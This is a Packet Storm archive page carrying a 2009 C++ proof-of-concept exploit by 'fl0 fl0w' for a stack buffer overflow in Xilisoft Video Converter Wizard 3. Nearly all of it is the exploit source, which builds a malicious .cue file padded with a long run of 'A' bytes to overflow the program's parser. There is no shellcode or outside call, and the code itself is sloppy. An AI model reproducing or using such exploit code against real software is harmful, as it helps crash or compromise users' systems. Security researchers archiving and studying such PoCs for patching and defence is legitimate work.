what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Xilisoft Video Converter Wizard Overflow

Xilisoft Video Converter Wizard Overflow
Posted Apr 10, 2009
Authored by fl0 fl0w | Site fl0-fl0w.docspages.com

Xilisoft Video Converter Wizard version 3 stack buffer overflow proof of concept exploit that creates a malicious .cue file.

tags | exploit, overflow, proof of concept
SHA-256 | 2cc126274b7c855c647fc40828ad4f69c12593b9076dda6df42940be2f139432
Download | Favorite | View

Xilisoft Video Converter Wizard Overflow

Change Mirror Download
/*
----------------------------------------------------------------------------------------
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

name: xilisoft.cpp

Credits : fl0 fl0w
----------------------------------------------------------------------------------------
ScreanShot in the debugger

Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
----------------------------------------------------------------------------------------
*/

//Start

#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define     SIZE 100000

#define     FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."  

class EXPLOIT {
  public:
  
int check (char *, char *);
void Usage (char *);
 };
 
static int  Poz = 1;
static int  Neg = 0;
  
int i;      

char Name [SIZE];    
char NeWbuff [SIZE];
                                            

                                                  int main (int argc, char *argv [])                                                                                           

 { 
         
        EXPLOIT VIDEO;
        
             
             if ( argc < 2) 
             
                VIDEO.Usage ( argv [0]); 
       
                                                  if ( VIDEO.check ( argv [1], "-file") == Neg) { 
                                                   
                                                       fprintf ( stdout , " Incorect input "); 
                                                       
                                                       printf ( " \t..Usage is %s -file filename.. \n", Name);
                                                                                                                              
                                                               exit ( 0);
                                                            
                                                            }
                                               
                                                                                 
        
        
          do {
        
            NeWbuff [i] = 'A';
         
            i++;
               
            }while (i < 500);
               
       
        
        FILE *f;
        
        strcpy (Name, argv [2]);
        
        strcat (Name, " .cue ");
        
        f = fopen (Name, "w");
        
        assert ( f != NULL);
        
        
        
        
        strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF)); 
                                                                 
          
        
        fputs("FILE \"", f);
        
        fprintf ( f, " %s ", NeWbuff);
               
                
        fprintf ( stdout , "File build ! ");
         
        exit ( 0);  
         
       getchar ();
       
                                                   return 0;        
                                                  }
                                                                                                    

                                                         
  
                                                  int EXPLOIT::check (char *Arg_, char *_Arg)
   
   {
        
       if ( strcmp ( Arg_, _Arg) == 0)
       
        return Poz;
        
      return Neg;
        
        }   
        
    void EXPLOIT::Usage (char *Name)
    
   {
     system ("cls");    
     fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n ");
     printf ( " \t..Usage is %s -file filename.. \n", Name);    
     fprintf ( stdout , "..All Credits fl0 fl0w.. \n");
     
     
         }   
         
        
//EOF


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close